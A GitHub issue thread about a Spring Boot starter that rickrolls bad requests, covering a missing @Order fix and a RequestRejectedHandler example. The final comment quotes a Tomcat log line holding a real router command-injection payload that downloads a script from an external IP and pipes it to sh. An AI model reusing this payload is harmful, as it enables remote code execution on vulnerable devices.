Can't rickroll when RequestRejectedException is thrown #20

Open
tschuehly opened this issue Jun 14, 2024 · 4 comments

tschuehly commented Jun 14, 2024

My WordPress guys can't formulate proper URLs:
image

The request is rejected before the filter and the rickroll is not applied.

I've tried adding an ExceptionAdvice, but Spring routes to the /error endpoint before the exception is caught:

    @ExceptionHandler(RequestRejectedException::class)
    @ResponseBody
    fun handleRequestRejected(e: RequestRejectedException, response: HttpServletResponse) {
        response.sendRedirect("https://www.youtube.com/watch?v=dQw4w9WgXcQ")
    }
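
Added example, not part of the original post or the project's code: Spring Security's firewall throws `RequestRejectedException` inside its own servlet filter, before the `DispatcherServlet` runs, so an `@ExceptionHandler` never sees it. Spring Security 5.4 and later pick up a `RequestRejectedHandler` bean for this case; the sketch below is an alternative to the `@Order` fix discussed later in the thread, and the class name `RequestRejectedConfig` and the log format are assumptions.

```kotlin
import org.slf4j.LoggerFactory
import org.springframework.context.annotation.Bean
import org.springframework.context.annotation.Configuration
import org.springframework.security.web.firewall.RequestRejectedException
import org.springframework.security.web.firewall.RequestRejectedHandler

// Hypothetical configuration class (name is an assumption, not from the project).
@Configuration
class RequestRejectedConfig {

    private val log = LoggerFactory.getLogger(RequestRejectedConfig::class.java)

    // Control characters are replaced before logging so that a hostile
    // request line cannot forge extra log entries.
    private val controlChars = Regex("\\p{Cntrl}")

    private fun safe(value: String?): String =
        controlChars.replace(value ?: "", "_").take(200)

    // Spring Security hands every request rejected by the HttpFirewall to this
    // bean instead of letting the exception propagate to the container's
    // /error dispatch.
    @Bean
    fun requestRejectedHandler(): RequestRejectedHandler =
        RequestRejectedHandler { request, response, ex: RequestRejectedException ->
            // One line per rejection instead of a full stack trace.
            log.info(
                "firewall rejected {} {} from {}: {}",
                safe(request.method),
                safe(request.requestURI),
                safe(request.remoteAddr),
                safe(ex.message)
            )
            if (!response.isCommitted) {
                // Same redirect target as the handler posted above.
                response.sendRedirect("https://www.youtube.com/watch?v=dQw4w9WgXcQ")
            }
        }
}
```

This hook only covers requests that reach Spring Security's filter chain; a request the servlet container rejects while parsing the request line never gets that far.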

@TomCools
Owner

Thanks for the report! Will look into this.

TomCools self-assigned this Jun 14, 2024
TomCools added the bug ("Something isn't working") label Jun 14, 2024

@TomCools
Owner

TomCools commented Jun 14, 2024

@tschuehly found the issue, simple missing @Order annotation on the Filter. I do have some issues with my release setup, so it'll be for tomorrow morning.

@TomCools
Owner

@tschuehly: This has been included in a new release: https://github.com/TomCools/rickroll-security-spring-boot-starter/releases/tag/v3.2.1.

I'll close this ticket once you've confirmed it works for you as well ;)

@tschuehly
Author

Hey @TomCools the fix works!

It doesn't apply if Tomcat catches the request because of an invalid character. This one clogs my logs as well 😔

    java.lang.IllegalArgumentException: Invalid character found in the request target [/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+http%3A%2F%2F103.149.28.141%2Ft+-O-+|+sh%60) ].
    The valid characters are defined in RFC 7230 and RFC 3986
    	at org.apache.coyote.http11.Http11InputBuffer.parseRequestLine(Http11InputBuffer.java:482) ~[tomcat-embed-core-10.1.16.jar:10.1.16]
    	at org.apache.coyote.http11.Http11Processor.service(Http11Processor.java:264) ~[tomcat-embed-core-10.1.16.jar:10.1.16]
    	at org.apache.coyote.AbstractProcessorLight.process(AbstractProcessorLight.java:63) ~[tomcat-embed-core-10.1.16.jar:10.1.16]
    	at org.apache.coyote.AbstractProtocol$ConnectionHandler.process(AbstractProtocol.java:896) ~[tomcat-embed-core-10.1.16.jar:10.1.16]
    	at org.apache.tomcat.util.net.NioEndpoint$SocketProcessor.doRun(NioEndpoint.java:1744) ~[tomcat-embed-core-10.1.16.jar:10.1.16]
    	at org.apache.tomcat.util.net.SocketProcessorBase.run(SocketProcessorBase.java:52) ~[tomcat-embed-core-10.1.16.jar:10.1.16]
    	at org.apache.tomcat.util.threads.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1191) ~[tomcat-embed-core-10.1.16.jar:10.1.16]
    	at org.apache.tomcat.util.threads.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:659) ~[tomcat-embed-core-10.1.16.jar:10.1.16]
    	at org.apache.tomcat.util.threads.TaskThread$WrappingRunnable.run(TaskThread.java:61) ~[tomcat-embed-core-10.1.16.jar:10.1.16]
    	at java.base/java.lang.Thread.run(Unknown Source) ~[na:na]
